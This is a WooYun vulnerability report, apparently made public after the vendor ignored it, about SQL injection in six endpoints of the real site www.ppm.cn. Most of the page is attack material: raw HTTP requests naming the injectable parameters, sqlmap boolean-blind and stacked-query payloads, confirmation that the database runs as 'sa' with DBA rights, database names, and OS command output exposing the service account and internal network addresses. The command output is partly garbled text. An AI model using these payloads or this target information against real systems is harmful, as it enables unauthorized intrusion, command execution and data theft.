乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
可os-shell,6处打包
GET /admin/Merop_Action.aspx?code=Book_Book_Hits&OperCode=Accumulate&val=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*POST /bookGuestbookList.aspx HTTP/1.1Content-Length: 74Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Book_ID$equal=1&pageno=1GET /GetArticleList_fhgc.aspx?M_ID$in=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*GET /GetFImg.aspx?M_F_ID=0 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*GET /GetRelevanceBook.aspx?BookID=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*GET /search.aspx?searchType=article&title=e HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.ppm.cn/Cookie: ASPSESSIONIDSCDASQDB=JEAILJNCJEHGBHPBNPDAGMCJHost: www.ppm.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
---Parameter: Book_ID$equal (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: Book_ID$equal=-7883 OR 9848=9848&pageno=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Book_ID$equal=1;WAITFOR DELAY '0:0:5'--&pageno=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2012current user: 'sa'current user is DBA: Trueavailable databases [6]:[*] [fhgf-www][*] [fhgf.web03.merop.net][*] master[*] model[*] msdb[*] tempdbcommand standard output:---nt service\mssqlserver nt service\mssqlserver---command standard output:---Windows IP 䶑湿 ⩙兿ʐ䶑桖 Ⱨし㽜昸㽜敤ꕣ: 㽜昸㽜敤ꕣ祲驛葶 DNS ๔ . . . . . . . : Ⱨしﺔꕣ IPv6 し䁗. . . . . . . . : fe80::4884:e964:999d:b456%11 IPv4 し䁗 . . . . . . . . . . . . : 10.2.176.211 偛兿ꥣŸ . . . . . . . . . . . . : 255.255.255.0 㽜改㽜㡤ꒋ兿獑. . . . . . . . . . . . . : 10.2.176.254 Ꞗ厐ʐ䶑桖 isatap.{4480FD8E-0207-404F-B3C0-0788365A409B}: 鉚协뙲Š . . . . . . . . . . . . : 鉚协굥_ 㽜昸㽜敤ꕣ祲驛葶 DNS ๔ . . . . . . . : Ꞗ厐ʐ䶑桖 Teredo Tunneling Pseudo-Interface: 㽜昸㽜敤ꕣ祲驛葶 DNS ๔ . . . . . . . : IPv6 し䁗 . . . . . . . . . . . . : 2001:0:ca66:6ecb:1859:263:f5fd:4f2c Ⱨしﺔꕣ IPv6 し䁗. . . . . . . . : fe80::1859:263:f5fd:4f2c%13 㽜改㽜㡤ꒋ兿獑. . . . . . . . . . . . . : ::
~~~
未能联系到厂商或者厂商积极拒绝